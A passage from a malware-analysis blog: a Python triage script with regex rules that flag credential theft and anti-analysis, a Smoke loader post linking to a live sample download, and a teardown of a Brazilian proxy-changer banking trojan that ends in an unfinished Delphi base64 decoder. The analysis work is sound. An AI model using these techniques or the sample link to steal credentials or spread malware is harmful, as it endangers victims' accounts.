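                         r"ftp (commander|navigator)|coffeecup|turboftp|globalscape",
                         r"plugins\\ftp|wcx_ftp\.ini|securefx"],
    "dpapi_decrypt": [r"cryptunprotectdata|pstorecreateinstance"],
    "protocol_credential_capture": [r"^auth plain$|^mail from:|^rcpt to:",
                                    r"(tcp|udp)extablefromstack"],
    "anti_analysis": [r"ntqueryinformationprocess"],
    "process_enumeration": [r"createtoolhelp32snapshot|process32(first|next)"],
    "mutex": [r"mutant$"],
}


def parse_strings(dump):
    # Returns [(encoding, value, truncated)]; headers and debugger notes are skipped.
    found = []
    for line in dump.splitlines():
        m = STRING_LINE.match(line)
        if not m:
            continue
        enc, body = m.group(1), m.group(2)
        truncated = not body.endswith('"')        # debugger cut the string short
        found.append((enc, body if truncated else body[:-1], truncated))
    return found


def classify(strings):
    # Maps each capability to the strings (in dump order) that triggered it.
    hits = defaultdict(list)
    for _, value, _ in strings:
        low = value.lower()
        for capability, patterns in CAPABILITY_RULES.items():
            if any(re.search(p, low) for p in patterns) and value not in hits[capability]:
                hits[capability].append(value)
    return dict(hits)


def extract_iocs(strings):
    # Atomic indicators worth blocking or hunting for, de-duplicated and sorted.
    iocs = {"ipv4": set(), "domains": set(), "registry_keys": set(), "mutexes": set()}
    for _, value, _ in strings:
        low = value.lower()
        if IPV4.match(value):
            iocs["ipv4"].add(value)
        elif DOMAIN.match(low) and low.rsplit(".", 1)[1] not in FILE_EXTENSIONS:
            iocs["domains"].add(value)             # file names like x.xml are not domains
        if low.startswith(("software\\", "system\\")):
            iocs["registry_keys"].add(value)
        if low.endswith("mutant"):
            iocs["mutexes"].add(value)
    return {k: sorted(v) for k, v in iocs.items()}


def triage(dump):
    strings = parse_strings(dump)
    return {"capabilities": classify(strings), "iocs": extract_iocs(strings),
            "truncated_strings": sum(1 for _, _, t in strings if t)}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_DUMP), indent=2))
```

<span style="font-family: Arial, Helvetica, sans-serif;">Run it as a script to print the JSON report, or call triage() on a dump saved from the debugger. Truncated strings are kept and counted rather than dropped: a registry key cut off at a fixed width still matches its rule, but a cut-off URL may be hiding parameters, so the count tells you how much of the listing you should re-read in the disassembler.</span><br />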
<br />
C&amp;C console<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAxIomvY1-paIT23vJbzOZvT14KzGg_ixRipZ1trmyOvKZCOQEjZCPlxdYhB4FP_RrfmiSJI5Rv3wlhwii3OgEyL4giuuz6Kjx4GrsscQZMEMWiS3LndwceczKNYxLfmVnuOKS8oTCT4/s1600/consola.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAxIomvY1-paIT23vJbzOZvT14KzGg_ixRipZ1trmyOvKZCOQEjZCPlxdYhB4FP_RrfmiSJI5Rv3wlhwii3OgEyL4giuuz6Kjx4GrsscQZMEMWiS3LndwceczKNYxLfmVnuOKS8oTCT4/s1600/consola.png" height="250" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The bot's Russian-language readme, found on the server.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN1XetZrMwagTKv3Y1EbdWHJ-u7S1SWKL4ipu7m0vCnXYm3ynKviS8fB7lXFFEpeJvoZmxpMIsjWDEGuhUD4bBk3iVqAla8o_T9tip1vp78-s99PhgfnVqqwRvt-_3X6tf5QtIZiGl-CA/s1600/ruso.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN1XetZrMwagTKv3Y1EbdWHJ-u7S1SWKL4ipu7m0vCnXYm3ynKviS8fB7lXFFEpeJvoZmxpMIsjWDEGuhUD4bBk3iVqAla8o_T9tip1vp78-s99PhgfnVqqwRvt-_3X6tf5QtIZiGl-CA/s1600/ruso.jpg" height="409" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">An interesting write-up on this bot </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-> http://www.webroot.com/blog/2012/02/03/a-peek-inside-the-smoke-malware-loader/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sample:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://mega.co.nz/#!9A1z2YpY!360jF2N2FbUFuss5vvNIDS-lX07nugOomLckduSPN7E</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">That's all for now.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">@Dkavalanche 2014</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-67682402711756200412014-05-12T08:44:00.000-07:002014-05-12T08:44:55.294-07:00<b style="background-color: #fefdfa;"><span style="color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-small;"><span style="line-height: 18.200000762939453px;">Fake hearing summons: Proxy Changer trojan</span></span></b><br />
<b style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.200000762939453px;"><br /></b><span style="background-color: #fefdfa; font-size: small;"><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;">Today I bring you a trojan of Brazilian origin. Once it infects the victim it changes the browser's proxy configuration (it points the browser at a PAC file served by the attacker) so that visits to Hotmail, PayPal, caixaeconomica, citibank, caixa, pagseguro.uol, live, facebook, bancobradesco, etc. are redirected to fake phishing sites that capture credentials.</span></span></span><br />
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 18.2px;"><br /></span><span style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: small; line-height: 18.2px;"></span><span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 18.2px;">Fake e-mails sent to the victims.</span><br />
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.200000762939453px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ImcM2PeMHnK-2llSwu6HS_sqehcC1V667X9CZcDzqkZg26tnjuf6rQciaAlHwKUlxUeitEr5N0ohiGKTadQjZzHdjuQUAfP5xCvcD9SGIv8aGJLfWsHqnUL8m_oBxNLmlKB5mrdCGOo/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ImcM2PeMHnK-2llSwu6HS_sqehcC1V667X9CZcDzqkZg26tnjuf6rQciaAlHwKUlxUeitEr5N0ohiGKTadQjZzHdjuQUAfP5xCvcD9SGIv8aGJLfWsHqnUL8m_oBxNLmlKB5mrdCGOo/s1600/fake.jpg" height="199" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: x-small;">https://www.virustotal.com/es/file/69513dae2d9e228285124c91a567b50fcdfec6802d37c505c2f84f4adcfc15bf/analysis/1399642976/</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<br />
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<table style="background-color: transparent; border-collapse: collapse; border-spacing: 0px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">SHA256:</span></td><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">69513dae2d9e228285124c91a567b50fcdfec6802d37c505c2f84f4adcfc15bf</span></td></tr>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Name:</span></td><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Visualizar_Intimacao140514.exe</span></td></tr>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Detections:</span></td><td class="text-red" style="color: rgb(180, 12, 26) !important; padding: 8px 10px 9px;"><span style="font-size: x-small;">23 / 52</span></td></tr>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Analysis date:</span></td><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">2014-05-09 13:42:56 UTC (3 days ago)</span></td></tr>
</tbody></table>
</div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<b>Anti-debugging routine</b></div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
IsDebuggerPresent </div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<br /></div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguflr_LnhNs9tpkXfTWhREhc2-EVpT5WGhl76jYVmcZUzjEIMDJVycLBImplPAnwqkWKyvX_mRZHQptFRllEqfDUbjHmpTTcAaEulNvnn7anh1nv4JAdB5Pm_CJnogKsxnmTSV8i30vXw/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguflr_LnhNs9tpkXfTWhREhc2-EVpT5WGhl76jYVmcZUzjEIMDJVycLBImplPAnwqkWKyvX_mRZHQptFRllEqfDUbjHmpTTcAaEulNvnn7anh1nv4JAdB5Pm_CJnogKsxnmTSV8i30vXw/s1600/04.png" height="228" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Encoded strings are visible in the binary.</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">058FD98 <ustring> 'GET'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0059210C <ustring> '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 005924AC <ustring> 'KtbpT6LjKczlT0'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 005924D8 <ustring> 'N45ZT6bsPIvYONG'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592504 <ustring> 'G6LZQ6yWRsPc'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0059252C <ustring> 'ScLdBcLuPI11H4GW8aXBGrLSKszcT7TXScLSJMbZSczpRsPqN5TfRcHlTtDSGtLoScLkT5PbSdDfRsvSIMvqPN9kPNGWKsLqT6bkPtCY82zs845rT6z3RsvcQMTLScmWBsGW9J4WBsO'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592650 <ustring> 'ScLdBcLuPI11H4GW8aXBJ4rSKszcT7TXScLSJMbZSczpRsPqN5DbOtLoQNHv84DbRdHbSY8WBtOWHcboPNTXR6n4QNDXOcnbJczqQMPv82zq8595Hrz4LqzIH20lP20mU30mC30mC30n82zc'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592780 <ustring> 'ScLdBcLuPI11H4GW8aXBJ4rSKszcT7TXScLSJMbZSczpRsPqN5DbOtLoQNHv84DbRdHbSY8WBtOWLN1aONHbSqHfSs5YR6LERtHfPdaWBtGWKaL7NqHNJr9482za831uC30mC30mC34WBsO'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C08 <ustring> '82zZ80'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C24 <ustring> 'KtbpT6LjKczlT0'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C50 <ustring> 'N45ZT6bsPJ8kOc5q80'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C84 <ustring> 'GL1GH45KGG'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592CA8 <ustring> 'N4rlUcbiR65SHcboPMPlU5nGSczcQMnbSm'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592CFC <ustring> 'N45ZT6bsPJ8kOc5q'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592D2C <ustring> 'OsGWBqGW8YL1K514GLH19LnDRtffR6nXN4PfScLcRtXSK79lPcbiPNCY'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592DAC <ustring> 'OsGWAYvaPMPXTMnq'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592DDC <ustring> 'SsLq86PVOM8z9MDa9G'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592E10 <ustring> 'PMDeRo1rSsLoNt1oPMOe8cvbT7TlScikS79lU7akONLqRsDlRcPfPrzrScmYB20Y9J4YAJi+FY8bPbzXOYLSS79bPdCkQdCY'</ustring></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The decoding routine starts at 00591FD0 /$ 55 PUSH EBP</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1L47Gt28jvtjuEu6lUUzgYZXBsOmZ5vUKwXTzUicOJKrmUeGrL8vg87uVbtFgXR3FsJCQUCbTGW4jcco-BRh25T3qzgDcoPGaMOJpGVORENyFwDiFY6wWWVMX7G5W8YtJqNKhtoQgJvw/s1600/05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1L47Gt28jvtjuEu6lUUzgYZXBsOmZ5vUKwXTzUicOJKrmUeGrL8vg87uVbtFgXR3FsJCQUCbTGW4jcco-BRh25T3qzgDcoPGaMOJpGVORENyFwDiFY6wWWVMX7G5W8YtJqNKhtoQgJvw/s1600/05.png" height="156" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Setting breakpoints at the right places, we can read the decoded strings off the stack.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutFL_i10g5xrzbqWsab2CtJYJke618DTeqCWArNzL8wGXQy-3iXhQKM3NbEJ-x9_fXGZurZG0wNskF-nrSm48JjBxUUkk2UScJNSnNxaWEqLiCXJGr5UCRUwa1JP_1136Va9cIZ4YxIc/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutFL_i10g5xrzbqWsab2CtJYJke618DTeqCWArNzL8wGXQy-3iXhQKM3NbEJ-x9_fXGZurZG0wNskF-nrSm48JjBxUUkk2UScJNSnNxaWEqLiCXJGr5UCRUwa1JP_1136Va9cIZ4YxIc/s1600/13.png" height="224" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp9EEEfK1HPPxbxXkJJV6ZyRt8qNGH7t6UWjsk-W-aAP3MjAzIris2eELyrimtrYQ0r9G0Korl5r2NJRdUQ85wGx8kv7QdzliGU1ZIHidVDH10qpmq_BvFfai2RaKY78X7B3FTL5mf3vs/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp9EEEfK1HPPxbxXkJJV6ZyRt8qNGH7t6UWjsk-W-aAP3MjAzIris2eELyrimtrYQ0r9G0Korl5r2NJRdUQ85wGx8kv7QdzliGU1ZIHidVDH10qpmq_BvFfai2RaKY78X7B3FTL5mf3vs/s1600/14.png" height="220" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizTa9p_ydpUw3EITbnEw0bNPAnDVRDIV9IDF_AfOeAmIu9h_ZiCSGJSqH0iNreFgRN12pulbsZg4iXHc-BEY5Uie2KxiJobLZ_vl-Tb67wnfiClcxjIf-BeaDVu5x1HCzrptdBQYQwn3M/s1600/09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizTa9p_ydpUw3EITbnEw0bNPAnDVRDIV9IDF_AfOeAmIu9h_ZiCSGJSqH0iNreFgRN12pulbsZg4iXHc-BEY5Uie2KxiJobLZ_vl-Tb67wnfiClcxjIf-BeaDVu5x1HCzrptdBQYQwn3M/s1600/09.png" height="104" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The routine is base64 with a non-standard alphabet (the table dumped at 0059210C: digits first, then upper case, lower case and '+/') and no padding. That alphabet alone is enough to decode the strings (the server reply below decodes directly to the PAC URL), so a standard base64 decoder only needs its alphabet swapped. The Delphi code below, from the thread linked next, uses exactly this table.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
http://www.delphipages.com/forum/archive/index.php/t-133728.html</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">const</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Codes64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">function Encode64(S: string): string;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">var</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">i: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := '';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">for i := 1 to Length(s) do</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := Ord(s[i]);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b * 256 + x;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a + 8;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">while a >= 6 do</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a - 6;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := b div (1 shl a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b mod (1 shl a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := Result + Codes64[x + 1];</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if a > 0 then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := b shl (6 - a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := Result + Codes64[x + 1];</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">function Decode64(S: string): string;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">var</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">i: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := '';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">for i := 1 to Length(s) do</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := Pos(s[i], codes64) - 1;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if x >= 0 then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b * 64 + x;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a + 6;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if a >= 8 then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a - 8;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := b shr a;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b mod (1 shl a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := x mod 256;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := Result + chr(x);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end</span></div>
<div class="separator" style="clear: both;">
